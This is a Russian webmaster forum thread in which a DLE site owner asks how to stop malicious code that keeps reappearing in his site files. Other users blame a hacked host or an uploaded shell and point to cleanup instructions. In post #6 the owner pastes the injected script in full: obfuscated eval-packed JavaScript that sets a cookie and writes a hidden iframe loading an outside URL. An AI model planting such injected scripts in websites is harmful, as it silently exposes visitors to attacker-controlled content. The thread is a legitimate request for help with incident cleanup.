Форум Практика оптимизации Любые вопросы от новичков по оптимизации

Вредоносный Код

12
Alexis510
На сайте с 13.05.2011
Offline
125
Alexis510
673

Здравствуйте уважаемые форумчане! Помогите советом... У меня несколько однотематических сайтов. Движок Dle. Месяц назад появился вредоносный код, его я обнаружил и сразу же удалил. На следующий день также история. Он всегда появлялся в одних и тех же файлах, которые размещены (engine/classes/js/). Короче я со злости удалил те файлы они и так ничего толкового не давали. Вроде 3 недели было все нормально, но сегодня опять появился вредоностый код, в этот раз в шаблоне сайта main.tpl. Код я конечно удалил, но что нужно сделать, чтобы ситуация не повторилась завтра?? Пароль уже поменял. Какую защиту еще можно поставить? Заранее спасибо...

[Удален]
#1

могли сломать хостера и пишут вирусню в файлы всех его клиентов

Alexis510
На сайте с 13.05.2011
Offline
125
Alexis510
#2
Sandalia:
могли сломать хостера и пишут вирусню в файлы всех его клиентов

Но хостер один из лучших. Jino.ru

[Удален]
#3

значит взломали тебя , чудес не бывает

Alexis510
На сайте с 13.05.2011
Offline
125
Alexis510
#4
Sandalia:
значит взломали тебя , чудес не бывает

Та я понял, что взломали. Вот и хочу узнать совет, что делать... Опять поменять пароль или есть другие методы защиты сайтов?

R
На сайте с 15.07.2007
Offline
60
ros
#5

Было так же. Залили шелл. На форуме /ru/forum/635696 вот этот человек помог.

Alexis510
На сайте с 13.05.2011
Offline
125
Alexis510
#6
ros:
Было так же. Залили шелл. На форуме /ru/forum/635696 вот этот человек помог.

Мне постоянно суют вот такой код: 

var domain = "http://av-yandex.ru/new/ok.php";

	eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('o C(r,G,D){m t=J N();m y="";t.U(t.Q()+D*P*H*H*O);y=t.R();l.n=r+"="+G+";S="+y}o E(r){m i=0;m j=0;m h=0;m u=l.n;z(i<=u.v){j=i;h=j+r.v;s(u.F(j,h)==r){j=h+1;h=l.n.V(";",j);s(h<j)h=l.n.v;q l.n.F(j,h);T}i++}q""}m u=l.n;s(E("B")=="I"){}W{C("B","I",1);L(o(p,a,c,k,e,d){e=o(c){q c.x(M)};s(!\'\'.A(/^/,K)){z(c--){d[c.x(a)]=k[c]||c.x(a)}k=[o(e){q d[e]}];e=o(){q\'\\\\w+\'};c=1};z(c--){s(k[c]){p=p.A(J X(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}q p}(\'6.7(\\\'<0 5="\\\'+4+\\\'" 2="3" 8="f" 9="e" d="c" a = "1" b = "1"></0>\\\');\',16,16,\'13|14|12|11|Y|Z|l|10|17|15|1c|1d|1e|1b|1a|18\'.19(\'|\'),0,{}))}',62,77,'|||||||||||||||||nEndPosition||nStartPosition||document|var|cookie|function||return|szName|if|dtExpires|szCookieString|length||toString|dtExpiryDate|while|replace|expsid|addCookie|dtDaysExpires|findCookie|substring|szValue|60|a0192e992bb5e61d51be0ae009c76edd|new|String|eval|36|Date|1000|24|getTime|toGMTString|expires|break|setTime|indexOf|else|RegExp|domain|src|write|facebook|name|iframe|1px|frameborder||scrolling|auto|split|no|align|height|width|center'.split('|'),0,{}));
The WishMaster
На сайте с 29.09.2005
Offline
2542
The WishMaster
#7
Alexis510:
Но хостер один из лучших. Jino.ru

Ой рассмешил... почитай про него отзывы :D

Пешу текста дешыго! Тематики - туризм, СЕО, творчество, кулинария, шизотерика :)
Zirkul
На сайте с 14.05.2008
Offline
155
Zirkul
#8

Джино последнее время сдает позиции и причем очень сильно. Как решить проблему с вредоносным кодом написано тут. Именно для Джино.

Изготовление сайтов любой сложности - визитки, лендинги, корпоративные, интернет-магазины и другие.
Alexis510
На сайте с 13.05.2011
Offline
125
Alexis510
#9
Zirkul:
Джино последнее время сдает позиции и причем очень сильно. Как решить проблему с вредоносным кодом написано тут. Именно для Джино.

Большое спасибо! Сделал все по инструкции, отправил сайты на перепроверку буду ждать результата.

Zirkul
На сайте с 14.05.2008
Offline
155
Zirkul
#10

Alexis510 отпишитесь по результатам, очень важно.

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий